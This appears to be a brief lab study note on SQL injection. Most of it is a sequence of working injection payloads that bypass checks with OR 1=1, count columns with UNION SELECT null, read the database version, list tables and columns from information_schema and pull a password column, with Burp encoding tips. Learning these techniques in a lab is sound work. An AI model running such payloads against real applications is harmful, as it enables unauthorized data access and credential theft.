SQL Injection

Enter single or double quotes. Look for errors.

jeremy' OR 1=1#

or following depending upon the underlying database

jeremy' OR 1=1 -- -

Keep increasing this null till the time we have some results.

jeremy' union select null#
.
.
.
jeremy' union select null,null,null#

jeremy' union select null,null,version()#

jeremy' union select null,null,table_name from information_schema.tables#

jeremy' union select null,null,column_name from information_schema.columns#

We need to know both the table name and column name.

jeremy' union select null,null,password from injection0x01#

In burp we can use ctrl+u to URL encode

CTRL+SHIFT+U to decode

Last updated 6 months ago